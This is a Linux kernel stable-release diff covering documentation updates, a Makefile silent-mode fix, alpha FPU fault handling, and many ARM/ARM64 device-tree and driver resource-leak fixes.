+diff --git a/Documentation/hwmon/ftsteutates.rst b/Documentation/hwmon/ftsteutates.rst
+index 58a2483d8d0da..198fa8e2819da 100644
+--- a/Documentation/hwmon/ftsteutates.rst
++++ b/Documentation/hwmon/ftsteutates.rst
+@@ -22,6 +22,10 @@ enhancements. It can monitor up to 4 voltages, 16 temperatures and
+ 8 fans. It also contains an integrated watchdog which is currently
+ implemented in this driver.
+ 
++The 4 voltages require a board-specific multiplier, since the BMC can
++only measure voltages up to 3.3V and thus relies on voltage dividers.
++Consult your motherboard manual for details.
++
+ To clear a temperature or fan alarm, execute the following command with the
+ correct path to the alarm file::
+ 
+diff --git a/Documentation/virt/kvm/api.rst b/Documentation/virt/kvm/api.rst
+index b8ec88ef2efa2..1bc61bf804f1f 100644
+--- a/Documentation/virt/kvm/api.rst
++++ b/Documentation/virt/kvm/api.rst
+@@ -4483,6 +4483,18 @@ not holding a previously reported uncorrected error).
+ :Parameters: struct kvm_s390_cmma_log (in, out)
+ :Returns: 0 on success, a negative value on error
+ 
++Errors:
++
++  ======     =============================================================
++  ENOMEM     not enough memory can be allocated to complete the task
++  ENXIO      if CMMA is not enabled
++  EINVAL     if KVM_S390_CMMA_PEEK is not set but migration mode was not enabled
++  EINVAL     if KVM_S390_CMMA_PEEK is not set but dirty tracking has been
++             disabled (and thus migration mode was automatically disabled)
++  EFAULT     if the userspace address is invalid or if no page table is
++             present for the addresses (e.g. when using hugepages).
++  ======     =============================================================
++
+ This ioctl is used to get the values of the CMMA bits on the s390
+ architecture. It is meant to be used in two scenarios:
+ 
+@@ -4563,12 +4575,6 @@ mask is unused.
+ 
+ values points to the userspace buffer where the result will be stored.
+ 
+-This ioctl can fail with -ENOMEM if not enough memory can be allocated to
+-complete the task, with -ENXIO if CMMA is not enabled, with -EINVAL if
+-KVM_S390_CMMA_PEEK is not set but migration mode was not enabled, with
+--EFAULT if the userspace address is invalid or if no page table is
+-present for the addresses (e.g. when using hugepages).
+-
+ 4.108 KVM_S390_SET_CMMA_BITS
+ ----------------------------
+ 
+diff --git a/Documentation/virt/kvm/devices/vm.rst b/Documentation/virt/kvm/devices/vm.rst
+index 60acc39e0e937..147efec626e52 100644
+--- a/Documentation/virt/kvm/devices/vm.rst
++++ b/Documentation/virt/kvm/devices/vm.rst
+@@ -302,6 +302,10 @@ Allows userspace to start migration mode, needed for PGSTE migration.
+ Setting this attribute when migration mode is already active will have
+ no effects.
+ 
++Dirty tracking must be enabled on all memslots, else -EINVAL is returned. When
++dirty tracking is disabled on any memslot, migration mode is automatically
++stopped.
++
+ :Parameters: none
+ :Returns:   -ENOMEM if there is not enough free memory to start migration mode;
+ 	    -EINVAL if the state of the VM is invalid (e.g. no memory defined);
+diff --git a/Makefile b/Makefile
+index 4dfe902b7f193..5ac6895229e9c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 15
++SUBLEVEL = 16
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+@@ -93,10 +93,17 @@ endif
+ 
+ # If the user is running make -s (silent mode), suppress echoing of
+ # commands
++# make-4.0 (and later) keep single letter options in the 1st word of MAKEFLAGS.
+ 
+-ifneq ($(findstring s,$(filter-out --%,$(MAKEFLAGS))),)
+-  quiet=silent_
+-  KBUILD_VERBOSE = 0
++ifeq ($(filter 3.%,$(MAKE_VERSION)),)
++silence:=$(findstring s,$(firstword -$(MAKEFLAGS)))
++else
++silence:=$(findstring s,$(filter-out --%,$(MAKEFLAGS)))
++endif
++
++ifeq ($(silence),s)
++quiet=silent_
++KBUILD_VERBOSE = 0
+ endif
+ 
+ export quiet Q KBUILD_VERBOSE
+diff --git a/arch/alpha/boot/tools/objstrip.c b/arch/alpha/boot/tools/objstrip.c
+index 08b430d25a315..7cf92d172dce9 100644
+--- a/arch/alpha/boot/tools/objstrip.c
++++ b/arch/alpha/boot/tools/objstrip.c
+@@ -148,7 +148,7 @@ main (int argc, char *argv[])
+ #ifdef __ELF__
+     elf = (struct elfhdr *) buf;
+ 
+-    if (elf->e_ident[0] == 0x7f && str_has_prefix((char *)elf->e_ident + 1, "ELF")) {
++    if (memcmp(&elf->e_ident[EI_MAG0], ELFMAG, SELFMAG) == 0) {
+ 	if (elf->e_type != ET_EXEC) {
+ 	    fprintf(stderr, "%s: %s is not an ELF executable\n",
+ 		    prog_name, inname);
+diff --git a/arch/alpha/kernel/traps.c b/arch/alpha/kernel/traps.c
+index 8a66fe544c69b..d9a67b370e047 100644
+--- a/arch/alpha/kernel/traps.c
++++ b/arch/alpha/kernel/traps.c
+@@ -233,7 +233,21 @@ do_entIF(unsigned long type, struct pt_regs *regs)
+ {
+ 	int signo, code;
+ 
+-	if ((regs->ps & ~IPL_MAX) == 0) {
++	if (type == 3) { /* FEN fault */
++		/* Irritating users can call PAL_clrfen to disable the
++		   FPU for the process.  The kernel will then trap in
++		   do_switch_stack and undo_switch_stack when we try
++		   to save and restore the FP registers.
++
++		   Given that GCC by default generates code that uses the
++		   FP registers, PAL_clrfen is not useful except for DoS
++		   attacks.  So turn the bleeding FPU back on and be done
++		   with it.  */
++		current_thread_info()->pcb.flags |= 1;
++		__reload_thread(&current_thread_info()->pcb);
++		return;
++	}
++	if (!user_mode(regs)) {
+ 		if (type == 1) {
+ 			const unsigned int *data
+ 			  = (const unsigned int *) regs->pc;
+@@ -366,20 +380,6 @@ do_entIF(unsigned long type, struct pt_regs *regs)
+ 		}
+ 		break;
+ 
+-	      case 3: /* FEN fault */
+-		/* Irritating users can call PAL_clrfen to disable the
+-		   FPU for the process.  The kernel will then trap in
+-		   do_switch_stack and undo_switch_stack when we try
+-		   to save and restore the FP registers.
+-
+-		   Given that GCC by default generates code that uses the
+-		   FP registers, PAL_clrfen is not useful except for DoS
+-		   attacks.  So turn the bleeding FPU back on and be done
+-		   with it.  */
+-		current_thread_info()->pcb.flags |= 1;
+-		__reload_thread(&current_thread_info()->pcb);
+-		return;
+-
+ 	      case 5: /* illoc */
+ 	      default: /* unexpected instruction-fault type */
+ 		      ;
+diff --git a/arch/arm/boot/dts/exynos3250-rinato.dts b/arch/arm/boot/dts/exynos3250-rinato.dts
+index 6d2c7bb191842..2eb682009815a 100644
+--- a/arch/arm/boot/dts/exynos3250-rinato.dts
++++ b/arch/arm/boot/dts/exynos3250-rinato.dts
+@@ -250,7 +250,7 @@
+ 	i80-if-timings {
+ 		cs-setup = <0>;
+ 		wr-setup = <0>;
+-		wr-act = <1>;
++		wr-active = <1>;
+ 		wr-hold = <0>;
+ 	};
+ };
+diff --git a/arch/arm/boot/dts/exynos4-cpu-thermal.dtsi b/arch/arm/boot/dts/exynos4-cpu-thermal.dtsi
+index 021d9fc1b4923..27a1a89526655 100644
+--- a/arch/arm/boot/dts/exynos4-cpu-thermal.dtsi
++++ b/arch/arm/boot/dts/exynos4-cpu-thermal.dtsi
+@@ -10,7 +10,7 @@
+ / {
+ thermal-zones {
+ 	cpu_thermal: cpu-thermal {
+-		thermal-sensors = <&tmu 0>;
++		thermal-sensors = <&tmu>;
+ 		polling-delay-passive = <0>;
+ 		polling-delay = <0>;
+ 		trips {
+diff --git a/arch/arm/boot/dts/exynos4.dtsi b/arch/arm/boot/dts/exynos4.dtsi
+index 5c4ecda27a476..7ba7a18c25000 100644
+--- a/arch/arm/boot/dts/exynos4.dtsi
++++ b/arch/arm/boot/dts/exynos4.dtsi
+@@ -605,7 +605,7 @@
+ 			status = "disabled";
+ 
+ 			hdmi_i2c_phy: hdmiphy@38 {
+-				compatible = "exynos4210-hdmiphy";
++				compatible = "samsung,exynos4210-hdmiphy";
+ 				reg = <0x38>;
+ 			};
+ 		};
+diff --git a/arch/arm/boot/dts/exynos4210.dtsi b/arch/arm/boot/dts/exynos4210.dtsi
+index 2c25cc37934e8..f8c6c5d1906af 100644
+--- a/arch/arm/boot/dts/exynos4210.dtsi
++++ b/arch/arm/boot/dts/exynos4210.dtsi
+@@ -393,7 +393,6 @@
+ &cpu_thermal {
+ 	polling-delay-passive = <0>;
+ 	polling-delay = <0>;
+-	thermal-sensors = <&tmu 0>;
+ };
+ 
+ &gic {
+diff --git a/arch/arm/boot/dts/exynos5250.dtsi b/arch/arm/boot/dts/exynos5250.dtsi
+index 4708dcd575a77..01751706ff96d 100644
+--- a/arch/arm/boot/dts/exynos5250.dtsi
++++ b/arch/arm/boot/dts/exynos5250.dtsi
+@@ -1107,7 +1107,7 @@
+ &cpu_thermal {
+ 	polling-delay-passive = <0>;
+ 	polling-delay = <0>;
+-	thermal-sensors = <&tmu 0>;
++	thermal-sensors = <&tmu>;
+ 
+ 	cooling-maps {
+ 		map0 {
+diff --git a/arch/arm/boot/dts/exynos5410-odroidxu.dts b/arch/arm/boot/dts/exynos5410-odroidxu.dts
+index d1cbc6b8a5703..e18110b93875a 100644
+--- a/arch/arm/boot/dts/exynos5410-odroidxu.dts
++++ b/arch/arm/boot/dts/exynos5410-odroidxu.dts
+@@ -120,7 +120,6 @@
+ };
+ 
+ &cpu0_thermal {
+-	thermal-sensors = <&tmu_cpu0 0>;
+ 	polling-delay-passive = <0>;
+ 	polling-delay = <0>;
+ 
+diff --git a/arch/arm/boot/dts/exynos5420.dtsi b/arch/arm/boot/dts/exynos5420.dtsi
+index 9f2523a873d9d..62263eb91b3cc 100644
+--- a/arch/arm/boot/dts/exynos5420.dtsi
++++ b/arch/arm/boot/dts/exynos5420.dtsi
+@@ -592,7 +592,7 @@
+ 		};
+ 
+ 		mipi_phy: mipi-video-phy {
+-			compatible = "samsung,s5pv210-mipi-video-phy";
++			compatible = "samsung,exynos5420-mipi-video-phy";
+ 			syscon = <&pmu_system_controller>;
+ 			#phy-cells = <1>;
+ 		};
+diff --git a/arch/arm/boot/dts/exynos5422-odroidhc1.dts b/arch/arm/boot/dts/exynos5422-odroidhc1.dts
+index 3de7019572a20..5e42803937067 100644
+--- a/arch/arm/boot/dts/exynos5422-odroidhc1.dts
++++ b/arch/arm/boot/dts/exynos5422-odroidhc1.dts
+@@ -31,7 +31,7 @@
+ 
+ 	thermal-zones {
+ 		cpu0_thermal: cpu0-thermal {
+-			thermal-sensors = <&tmu_cpu0 0>;
++			thermal-sensors = <&tmu_cpu0>;
+ 			trips {
+ 				cpu0_alert0: cpu-alert-0 {
+ 					temperature = <70000>; /* millicelsius */
+@@ -86,7 +86,7 @@
+ 			};
+ 		};
+ 		cpu1_thermal: cpu1-thermal {
+-			thermal-sensors = <&tmu_cpu1 0>;
++			thermal-sensors = <&tmu_cpu1>;
+ 			trips {
+ 				cpu1_alert0: cpu-alert-0 {
+ 					temperature = <70000>;
+@@ -130,7 +130,7 @@
+ 			};
+ 		};
+ 		cpu2_thermal: cpu2-thermal {
+-			thermal-sensors = <&tmu_cpu2 0>;
++			thermal-sensors = <&tmu_cpu2>;
+ 			trips {
+ 				cpu2_alert0: cpu-alert-0 {
+ 					temperature = <70000>;
+@@ -174,7 +174,7 @@
+ 			};
+ 		};
+ 		cpu3_thermal: cpu3-thermal {
+-			thermal-sensors = <&tmu_cpu3 0>;
++			thermal-sensors = <&tmu_cpu3>;
+ 			trips {
+ 				cpu3_alert0: cpu-alert-0 {
+ 					temperature = <70000>;
+@@ -218,7 +218,7 @@
+ 			};
+ 		};
+ 		gpu_thermal: gpu-thermal {
+-			thermal-sensors = <&tmu_gpu 0>;
++			thermal-sensors = <&tmu_gpu>;
+ 			trips {
+ 				gpu_alert0: gpu-alert-0 {
+ 					temperature = <70000>;
+diff --git a/arch/arm/boot/dts/exynos5422-odroidxu3-common.dtsi b/arch/arm/boot/dts/exynos5422-odroidxu3-common.dtsi
+index a6961ff240304..e6e7e2ff2a261 100644
+--- a/arch/arm/boot/dts/exynos5422-odroidxu3-common.dtsi
++++ b/arch/arm/boot/dts/exynos5422-odroidxu3-common.dtsi
+@@ -50,7 +50,7 @@
+ 
+ 	thermal-zones {
+ 		cpu0_thermal: cpu0-thermal {
+-			thermal-sensors = <&tmu_cpu0 0>;
++			thermal-sensors = <&tmu_cpu0>;
+ 			polling-delay-passive = <250>;
+ 			polling-delay = <0>;
+ 			trips {
+@@ -139,7 +139,7 @@
+ 			};
+ 		};
+ 		cpu1_thermal: cpu1-thermal {
+-			thermal-sensors = <&tmu_cpu1 0>;
++			thermal-sensors = <&tmu_cpu1>;
+ 			polling-delay-passive = <250>;
+ 			polling-delay = <0>;
+ 			trips {
+@@ -212,7 +212,7 @@
+ 			};
+ 		};
+ 		cpu2_thermal: cpu2-thermal {
+-			thermal-sensors = <&tmu_cpu2 0>;
++			thermal-sensors = <&tmu_cpu2>;
+ 			polling-delay-passive = <250>;
+ 			polling-delay = <0>;
+ 			trips {
+@@ -285,7 +285,7 @@
+ 			};
+ 		};
+ 		cpu3_thermal: cpu3-thermal {
+-			thermal-sensors = <&tmu_cpu3 0>;
++			thermal-sensors = <&tmu_cpu3>;
+ 			polling-delay-passive = <250>;
+ 			polling-delay = <0>;
+ 			trips {
+@@ -358,7 +358,7 @@
+ 			};
+ 		};
+ 		gpu_thermal: gpu-thermal {
+-			thermal-sensors = <&tmu_gpu 0>;
++			thermal-sensors = <&tmu_gpu>;
+ 			polling-delay-passive = <250>;
+ 			polling-delay = <0>;
+ 			trips {
+diff --git a/arch/arm/boot/dts/imx7s.dtsi b/arch/arm/boot/dts/imx7s.dtsi
+index 0fc9e6b8b05dc..11b9321badc51 100644
+--- a/arch/arm/boot/dts/imx7s.dtsi
++++ b/arch/arm/boot/dts/imx7s.dtsi
+@@ -513,7 +513,7 @@
+ 
+ 				mux: mux-controller {
+ 					compatible = "mmio-mux";
+-					#mux-control-cells = <0>;
++					#mux-control-cells = <1>;
+ 					mux-reg-masks = <0x14 0x00000010>;
+ 				};
+ 
+diff --git a/arch/arm/boot/dts/qcom-sdx55.dtsi b/arch/arm/boot/dts/qcom-sdx55.dtsi
+index c72540223fa92..29fdf29fdb8c8 100644
+--- a/arch/arm/boot/dts/qcom-sdx55.dtsi
++++ b/arch/arm/boot/dts/qcom-sdx55.dtsi
+@@ -577,7 +577,7 @@
+ 		};
+ 
+ 		apps_smmu: iommu@15000000 {
+-			compatible = "qcom,sdx55-smmu-500", "arm,mmu-500";
++			compatible = "qcom,sdx55-smmu-500", "qcom,smmu-500", "arm,mmu-500";
+ 			reg = <0x15000000 0x20000>;
+ 			#iommu-cells = <2>;
+ 			#global-interrupts = <1>;
+diff --git a/arch/arm/boot/dts/qcom-sdx65.dtsi b/arch/arm/boot/dts/qcom-sdx65.dtsi
+index 4cd405db55000..ecb9171e4da5f 100644
+--- a/arch/arm/boot/dts/qcom-sdx65.dtsi
++++ b/arch/arm/boot/dts/qcom-sdx65.dtsi
+@@ -455,7 +455,7 @@
+ 		};
+ 
+ 		apps_smmu: iommu@15000000 {
+-			compatible = "qcom,sdx65-smmu-500", "arm,mmu-500";
++			compatible = "qcom,sdx65-smmu-500", "qcom,smmu-500", "arm,mmu-500";
+ 			reg = <0x15000000 0x40000>;
+ 			#iommu-cells = <2>;
+ 			#global-interrupts = <1>;
+diff --git a/arch/arm/boot/dts/stm32mp131.dtsi b/arch/arm/boot/dts/stm32mp131.dtsi
+index dd35a607073dd..723787f72cfd9 100644
+--- a/arch/arm/boot/dts/stm32mp131.dtsi
++++ b/arch/arm/boot/dts/stm32mp131.dtsi
+@@ -405,6 +405,7 @@
+ 
+ 			part_number_otp: part_number_otp@4 {
+ 				reg = <0x4 0x2>;
++				bits = <0 12>;
+ 			};
+ 			ts_cal1: calib@5c {
+ 				reg = <0x5c 0x2>;
+diff --git a/arch/arm/boot/dts/sun8i-h3-nanopi-duo2.dts b/arch/arm/boot/dts/sun8i-h3-nanopi-duo2.dts
+index 43641cb82398f..343b02b971555 100644
+--- a/arch/arm/boot/dts/sun8i-h3-nanopi-duo2.dts
++++ b/arch/arm/boot/dts/sun8i-h3-nanopi-duo2.dts
+@@ -57,7 +57,7 @@
+ 		regulator-ramp-delay = <50>; /* 4ms */
+ 
+ 		enable-active-high;
+-		enable-gpio = <&r_pio 0 8 GPIO_ACTIVE_HIGH>; /* PL8 */
++		enable-gpios = <&r_pio 0 8 GPIO_ACTIVE_HIGH>; /* PL8 */
+ 		gpios = <&r_pio 0 6 GPIO_ACTIVE_HIGH>; /* PL6 */
+ 		gpios-states = <0x1>;
+ 		states = <1100000 0>, <1300000 1>;
+diff --git a/arch/arm/configs/bcm2835_defconfig b/arch/arm/configs/bcm2835_defconfig
+index a51babd178c26..be0c984a66947 100644
+--- a/arch/arm/configs/bcm2835_defconfig
++++ b/arch/arm/configs/bcm2835_defconfig
+@@ -107,6 +107,7 @@ CONFIG_MEDIA_CAMERA_SUPPORT=y
+ CONFIG_DRM=y
+ CONFIG_DRM_V3D=y
+ CONFIG_DRM_VC4=y
++CONFIG_FB=y
+ CONFIG_FB_SIMPLE=y
+ CONFIG_FRAMEBUFFER_CONSOLE=y
+ CONFIG_SOUND=y
+diff --git a/arch/arm/mach-imx/mmdc.c b/arch/arm/mach-imx/mmdc.c
+index af12668d0bf51..b9efe9da06e0b 100644
+--- a/arch/arm/mach-imx/mmdc.c
++++ b/arch/arm/mach-imx/mmdc.c
+@@ -99,6 +99,7 @@ struct mmdc_pmu {
+ 	cpumask_t cpu;
+ 	struct hrtimer hrtimer;
+ 	unsigned int active_events;
++	int id;
+ 	struct device *dev;
+ 	struct perf_event *mmdc_events[MMDC_NUM_COUNTERS];
+ 	struct hlist_node node;
+@@ -433,8 +434,6 @@ static enum hrtimer_restart mmdc_pmu_timer_handler(struct hrtimer *hrtimer)
+ static int mmdc_pmu_init(struct mmdc_pmu *pmu_mmdc,
+ 		void __iomem *mmdc_base, struct device *dev)
+ {
+-	int mmdc_num;
+-
+ 	*pmu_mmdc = (struct mmdc_pmu) {
+ 		.pmu = (struct pmu) {
+ 			.task_ctx_nr    = perf_invalid_context,
+@@ -452,15 +451,16 @@ static int mmdc_pmu_init(struct mmdc_pmu *pmu_mmdc,
+ 		.active_events = 0,
+ 	};
+ 
+-	mmdc_num = ida_simple_get(&mmdc_ida, 0, 0, GFP_KERNEL);
++	pmu_mmdc->id = ida_simple_get(&mmdc_ida, 0, 0, GFP_KERNEL);
+ 
+-	return mmdc_num;
++	return pmu_mmdc->id;
+ }
+ 
+ static int imx_mmdc_remove(struct platform_device *pdev)
+ {
+ 	struct mmdc_pmu *pmu_mmdc = platform_get_drvdata(pdev);
+ 
++	ida_simple_remove(&mmdc_ida, pmu_mmdc->id);
+ 	cpuhp_state_remove_instance_nocalls(cpuhp_mmdc_state, &pmu_mmdc->node);
+ 	perf_pmu_unregister(&pmu_mmdc->pmu);
+ 	iounmap(pmu_mmdc->mmdc_base);
+@@ -474,7 +474,6 @@ static int imx_mmdc_perf_init(struct platform_device *pdev, void __iomem *mmdc_b
+ {
+ 	struct mmdc_pmu *pmu_mmdc;
+ 	char *name;
+-	int mmdc_num;
+ 	int ret;
+ 	const struct of_device_id *of_id =
+ 		of_match_device(imx_mmdc_dt_ids, &pdev->dev);
+@@ -497,14 +496,14 @@ static int imx_mmdc_perf_init(struct platform_device *pdev, void __iomem *mmdc_b
+ 		cpuhp_mmdc_state = ret;
+ 	}
+ 
+-	mmdc_num = mmdc_pmu_init(pmu_mmdc, mmdc_base, &pdev->dev);
+-	pmu_mmdc->mmdc_ipg_clk = mmdc_ipg_clk;
+-	if (mmdc_num == 0)
+-		name = "mmdc";
+-	else
+-		name = devm_kasprintf(&pdev->dev,
+-				GFP_KERNEL, "mmdc%d", mmdc_num);
++	ret = mmdc_pmu_init(pmu_mmdc, mmdc_base, &pdev->dev);
++	if (ret < 0)
++		goto  pmu_free;
+ 
++	name = devm_kasprintf(&pdev->dev,
++				GFP_KERNEL, "mmdc%d", ret);
++
++	pmu_mmdc->mmdc_ipg_clk = mmdc_ipg_clk;
+ 	pmu_mmdc->devtype_data = (struct fsl_mmdc_devtype_data *)of_id->data;
+ 
+ 	hrtimer_init(&pmu_mmdc->hrtimer, CLOCK_MONOTONIC,
+@@ -525,6 +524,7 @@ static int imx_mmdc_perf_init(struct platform_device *pdev, void __iomem *mmdc_b
+ 
+ pmu_register_err:
+ 	pr_warn("MMDC Perf PMU failed (%d), disabled\n", ret);
++	ida_simple_remove(&mmdc_ida, pmu_mmdc->id);
+ 	cpuhp_state_remove_instance_nocalls(cpuhp_mmdc_state, &pmu_mmdc->node);
+ 	hrtimer_cancel(&pmu_mmdc->hrtimer);
+ pmu_free:
+diff --git a/arch/arm/mach-omap1/timer.c b/arch/arm/mach-omap1/timer.c
+index f5cd4bbf7566d..81a912c1145a9 100644
+--- a/arch/arm/mach-omap1/timer.c
++++ b/arch/arm/mach-omap1/timer.c
+@@ -158,7 +158,7 @@ err_free_pdata:
+ 	kfree(pdata);
+ 
+ err_free_pdev:
+-	platform_device_unregister(pdev);
++	platform_device_put(pdev);
+ 
+ 	return ret;
+ }
+diff --git a/arch/arm/mach-omap2/omap4-common.c b/arch/arm/mach-omap2/omap4-common.c
+index 6d1eb4eefefe5..d9ed2a5dcd5ef 100644
+--- a/arch/arm/mach-omap2/omap4-common.c
++++ b/arch/arm/mach-omap2/omap4-common.c
+@@ -140,6 +140,7 @@ static int __init omap4_sram_init(void)
+ 			__func__);
+ 	else
+ 		sram_sync = (void __iomem *)gen_pool_alloc(sram_pool, PAGE_SIZE);
++	of_node_put(np);
+ 
+ 	return 0;
+ }
+diff --git a/arch/arm/mach-omap2/timer.c b/arch/arm/mach-omap2/timer.c
+index 620ba69c8f114..5677c4a08f376 100644
+--- a/arch/arm/mach-omap2/timer.c
++++ b/arch/arm/mach-omap2/timer.c
+@@ -76,6 +76,7 @@ static void __init realtime_counter_init(void)
+ 	}
+ 
+ 	rate = clk_get_rate(sys_clk);
++	clk_put(sys_clk);
+ 
+ 	if (soc_is_dra7xx()) {
+ 		/*
+diff --git a/arch/arm/mach-s3c/s3c64xx.c b/arch/arm/mach-s3c/s3c64xx.c
+index 0a8116c108fe4..dce2b0e953088 100644
+--- a/arch/arm/mach-s3c/s3c64xx.c
++++ b/arch/arm/mach-s3c/s3c64xx.c
+@@ -173,7 +173,8 @@ static struct samsung_pwm_variant s3c64xx_pwm_variant = {
+ 	.tclk_mask	= (1 << 7) | (1 << 6) | (1 << 5),
+ };
+ 
+-void __init s3c64xx_set_timer_source(unsigned int event, unsigned int source)
++void __init s3c64xx_set_timer_source(enum s3c64xx_timer_mode event,
++				     enum s3c64xx_timer_mode source)
+ {
+ 	s3c64xx_pwm_variant.output_mask = BIT(SAMSUNG_PWM_NUM) - 1;
+ 	s3c64xx_pwm_variant.output_mask &= ~(BIT(event) | BIT(source));
+diff --git a/arch/arm/mach-zynq/slcr.c b/arch/arm/mach-zynq/slcr.c
+index 37707614885a5..9765b3f4c2fc5 100644
+--- a/arch/arm/mach-zynq/slcr.c
++++ b/arch/arm/mach-zynq/slcr.c
+@@ -213,6 +213,7 @@ int __init zynq_early_slcr_init(void)
+ 	zynq_slcr_regmap = syscon_regmap_lookup_by_compatible("xlnx,zynq-slcr");
+ 	if (IS_ERR(zynq_slcr_regmap)) {
+ 		pr_err("%s: failed to find zynq-slcr\n", __func__);
++		of_node_put(np);
+ 		return -ENODEV;
+ 	}
+ 
+diff --git a/arch/arm64/Kconfig b/arch/arm64/Kconfig
+index 505c8a1ccbe0c..43ff7c7a3ac97 100644
+--- a/arch/arm64/Kconfig
++++ b/arch/arm64/Kconfig
+@@ -98,7 +98,6 @@ config ARM64
+ 	select ARCH_WANT_DEFAULT_TOPDOWN_MMAP_LAYOUT
+ 	select ARCH_WANT_FRAME_POINTERS
+ 	select ARCH_WANT_HUGE_PMD_SHARE if ARM64_4K_PAGES || (ARM64_16K_PAGES && !ARM64_VA_BITS_36)
+-	select ARCH_WANT_HUGETLB_PAGE_OPTIMIZE_VMEMMAP
+ 	select ARCH_WANT_LD_ORPHAN_WARN
+ 	select ARCH_WANTS_NO_INSTR
+ 	select ARCH_WANTS_THP_SWAP if ARM64_4K_PAGES
+diff --git a/arch/arm64/boot/dts/amlogic/meson-axg-jethome-jethub-j1xx.dtsi b/arch/arm64/boot/dts/amlogic/meson-axg-jethome-jethub-j1xx.dtsi
+index 5836b00309312..e1605a9b0a13f 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-axg-jethome-jethub-j1xx.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-axg-jethome-jethub-j1xx.dtsi
+@@ -168,15 +168,15 @@
+ 		reg = <0x32 0x20>;
+ 	};
+ 
+-	eth_mac: eth_mac@0 {
++	eth_mac: eth-mac@0 {
+ 		reg = <0x0 0x6>;
+ 	};
+ 
+-	bt_mac: bt_mac@6 {
++	bt_mac: bt-mac@6 {
+ 		reg = <0x6 0x6>;
+ 	};
+ 
+-	wifi_mac: wifi_mac@c {
++	wifi_mac: wifi-mac@c {
+ 		reg = <0xc 0x6>;
+ 	};
+ 
+@@ -217,7 +217,7 @@
+ 	pinctrl-names = "default";
+ 
+ 	/* RTC */
+-	pcf8563: pcf8563@51 {
++	pcf8563: rtc@51 {
+ 		compatible = "nxp,pcf8563";
+ 		reg = <0x51>;
+ 		status = "okay";
+@@ -303,7 +303,7 @@
+ 
+ &usb {
+ 	status = "okay";
+-	phy-supply = <&usb_pwr>;
++	vbus-supply = <&usb_pwr>;
+ };
+ 
+ &spicc1 {
+diff --git a/arch/arm64/boot/dts/amlogic/meson-axg.dtsi b/arch/arm64/boot/dts/amlogic/meson-axg.dtsi
+index 73cd1791a13fa..6cc685f91fc94 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-axg.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-axg.dtsi
+@@ -152,7 +152,7 @@
+ 		scpi_clocks: clocks {
+ 			compatible = "arm,scpi-clocks";
+ 
+-			scpi_dvfs: clock-controller {
++			scpi_dvfs: clocks-0 {
+ 				compatible = "arm,scpi-dvfs-clocks";
+ 				#clock-cells = <1>;
+ 				clock-indices = <0>;
+@@ -161,7 +161,7 @@
+ 		};
+ 
+ 		scpi_sensors: sensors {
+-			compatible = "amlogic,meson-gxbb-scpi-sensors";
++			compatible = "amlogic,meson-gxbb-scpi-sensors", "arm,scpi-sensors";
+ 			#thermal-sensor-cells = <1>;
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi b/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
+index 894cea697550a..131a8a5a9f5a0 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-g12-common.dtsi
+@@ -1694,7 +1694,7 @@
+ 					#address-cells = <1>;
+ 					#size-cells = <0>;
+ 
+-					internal_ephy: ethernet_phy@8 {
++					internal_ephy: ethernet-phy@8 {
+ 						compatible = "ethernet-phy-id0180.3301",
+ 							     "ethernet-phy-ieee802.3-c22";
+ 						interrupts = <GIC_SPI 9 IRQ_TYPE_LEVEL_HIGH>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-g12a-radxa-zero.dts b/arch/arm64/boot/dts/amlogic/meson-g12a-radxa-zero.dts
+index e3bb6df42ff3e..cf0a9be83fc47 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-g12a-radxa-zero.dts
++++ b/arch/arm64/boot/dts/amlogic/meson-g12a-radxa-zero.dts
+@@ -401,5 +401,4 @@
+ 
+ &usb {
+ 	status = "okay";
+-	dr_mode = "host";
+ };
+diff --git a/arch/arm64/boot/dts/amlogic/meson-g12a.dtsi b/arch/arm64/boot/dts/amlogic/meson-g12a.dtsi
+index fb0ab27d1f642..6eaceb717d617 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-g12a.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-g12a.dtsi
+@@ -57,26 +57,6 @@
+ 		compatible = "operating-points-v2";
+ 		opp-shared;
+ 
+-		opp-100000000 {
+-			opp-hz = /bits/ 64 <100000000>;
+-			opp-microvolt = <731000>;
+-		};
+-
+-		opp-250000000 {
+-			opp-hz = /bits/ 64 <250000000>;
+-			opp-microvolt = <731000>;
+-		};
+-
+-		opp-500000000 {
+-			opp-hz = /bits/ 64 <500000000>;
+-			opp-microvolt = <731000>;
+-		};
+-
+-		opp-667000000 {
+-			opp-hz = /bits/ 64 <666666666>;
+-			opp-microvolt = <731000>;
+-		};
+-
+ 		opp-1000000000 {
+ 			opp-hz = /bits/ 64 <1000000000>;
+ 			opp-microvolt = <731000>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gx-libretech-pc.dtsi b/arch/arm64/boot/dts/amlogic/meson-gx-libretech-pc.dtsi
+index bcdf55f48a831..4e84ab87cc7db 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gx-libretech-pc.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-gx-libretech-pc.dtsi
+@@ -17,7 +17,7 @@
+ 		io-channel-names = "buttons";
+ 		keyup-threshold-microvolt = <1800000>;
+ 
+-		update-button {
++		button-update {
+ 			label = "update";
+ 			linux,code = <KEY_VENDOR>;
+ 			press-threshold-microvolt = <1300000>;
+diff --git a/arch/arm64/boot/dts/amlogic/meson-gx.dtsi b/arch/arm64/boot/dts/amlogic/meson-gx.dtsi
+index fa6cff4a2ebc3..80d86780cb6ba 100644
+--- a/arch/arm64/boot/dts/amlogic/meson-gx.dtsi
++++ b/arch/arm64/boot/dts/amlogic/meson-gx.dtsi
+@@ -232,7 +232,7 @@
+ 			reg = <0x14 0x10>;
+ 		};
+ 
+-		eth_mac: eth_mac@34 {
++		eth_mac: eth-mac@34 {
+ 			reg = <0x34 0x10>;
+ 		};
+ 
